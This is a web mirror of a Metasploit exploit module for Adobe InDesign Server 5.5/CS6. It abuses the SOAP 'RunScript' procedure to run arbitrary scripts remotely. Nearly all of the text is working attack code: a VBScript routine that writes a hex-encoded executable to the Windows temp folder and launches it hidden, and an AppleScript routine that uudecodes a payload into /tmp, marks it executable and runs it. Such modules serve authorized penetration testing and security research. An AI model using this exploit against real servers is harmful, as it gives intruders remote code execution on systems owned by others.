Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
32197 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',

17
        'Description' => %q{

18
          This module abuses the "RunScript" procedure provided by the SOAP interface of

19
          Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).

20


21
          The exploit drops the payload on the server and must be removed manually.

22
        },

23
        'Author' => [

24
          'h0ng10' # Vulnerability discovery / Metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'Privileged' => false,

28
        'DisclosureDate' => '2012-11-11',

29
        'References' => [

30
          [ 'OSVDB', '87548'],

31
          [ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]

32
        ],

33
        'Targets' => [

34
          [

35
            'Indesign CS6 Server / Windows (64 bits)',

36
            {

37
              'Arch' => ARCH_X64,

38
              'Platform' => 'win'

39
            }

40
          ],

41
          [

42
            'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',

43
            {

44
              'Arch' => ARCH_X64,

45
              'Author' => 'juan vazquez',

46
              'Platform' => 'osx'

47
            }

48
          ]

49
        ],

50
        'DefaultTarget' => 0,

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    register_options([ Opt::RPORT(12345) ])

60
  end

61


62
  def send_soap_request(script_code, script_type)

63
    script_code.gsub!(/&/, '&amp;')

64
    soap_xml = %(

65
<?xml version="1.0" encoding="UTF-8"?>

66
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"

67
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

68
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">

69
  <SOAP-ENV:Body>

70
    <IDSP:RunScript>

71
      <IDSP:runScriptParameters>

72
        <IDSP:scriptText>#{script_code}</IDSP:scriptText>

73
        <IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>

74
      </IDSP:runScriptParameters>

75
    </IDSP:RunScript>

76
  </SOAP-ENV:Body>

77
</SOAP-ENV:Envelope>

78
)

79


80
    send_request_cgi({

81
      'uri' => '/',

82
      'method' => 'POST',

83
      'content-type' => 'application/x-www-form-urlencoded',

84
      'data' => soap_xml

85
    }, 5)

86
  end

87


88
  def check

89
    # Use a very simple javascript

90
    check_var = rand_text_numeric(10)

91
    checkscript = 'returnValue = "' + check_var + '"'

92


93
    res = send_soap_request(checkscript, 'javascript')

94


95
    return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')

96


97
    return Exploit::CheckCode::Safe

98
  end

99


100
  def exploit

101
    if target.name =~ /Windows/

102
      print_status('Creating payload vbs script')

103
      encoded_payload = generate_payload_exe.unpack('H*').join

104
      exe_file = Rex::Text.rand_text_alpha_upper(8) + '.exe'

105
      wsf = Rex::Text.rand_text_alpha(8)

106
      payload_var = Rex::Text.rand_text_alpha(8)

107
      exe_name_var = Rex::Text.rand_text_alpha(8)

108
      file_var = Rex::Text.rand_text_alpha(8)

109
      byte_var = Rex::Text.rand_text_alpha(8)

110
      shell_var = Rex::Text.rand_text_alpha(8)

111


112
      # This one creates a smaller vbs payload (without deletion)

113
      vbs = %{

114
Set #{wsf} = CreateObject("Scripting.FileSystemObject")

115
#{payload_var}  = "#{encoded_payload}"

116
#{exe_name_var} =  #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"

117
Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)

118
For x = 1 To Len(#{payload_var})-3 Step 2

119
  #{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)

120
  #{file_var}.write Chr(#{byte_var})

121
Next

122


123
#{file_var}.write Chr(#{byte_var})

124
#{file_var}.close

125


126
Set #{shell_var} = CreateObject("Wscript.Shell")

127
#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False

128
Set #{shell_var} = Nothing

129
returnValue = #{exe_name_var}

130
      }

131
      #	vbs = Msf::Util::EXE.to_exe_vbs(exe)

132
      print_status('Sending SOAP request')

133


134
      res = send_soap_request(vbs, 'visual basic')

135
      if !res.nil? and !res.body.nil?

136
        file_to_delete = res.body.to_s.scan(%r{<data xsi:type="xsd:string">(.*)</data></scriptResult>}).flatten[0]

137
        print_warning "Payload deployed to #{file_to_delete}, please remove manually"

138
      end

139


140
    elsif target.name =~ /Mac OS X/

141


142
      print_status('Creating payload apple script')

143


144
      exe_payload = generate_payload_exe

145
      b64_exe_payload = Rex::Text.encode_base64(exe_payload)

146
      b64_payload_name = rand_text_alpha(rand(5..9))

147
      payload_name = rand_text_alpha(rand(5..9))

148


149
      apple_script = %(

150
set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission

151
write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp

152
close access fp

153
do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"

154
do shell script "rm /tmp/#{b64_payload_name}.txt"

155
do shell script "chmod +x /tmp/#{payload_name}"

156
do shell script "/tmp/#{payload_name}"

157
set returnValue to "/tmp/#{payload_name}"

158
      )

159


160
      print_status('Sending SOAP request')

161


162
      res = send_soap_request(apple_script, 'applescript')

163


164
      if !res.nil? and !res.body.nil?

165
        file_to_delete = res.body.to_s.scan(%r{<data xsi:type="xsd:string">(.*)</data></scriptResult>}).flatten[0]

166
        file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?

167
        print_warning "Payload deployed to #{file_to_delete}, please remove manually"

168
      elsif !res

169
        print_status "No response, it's expected"

170
        print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"

171
      end

172


173
    end

174
  end

175
end

176


177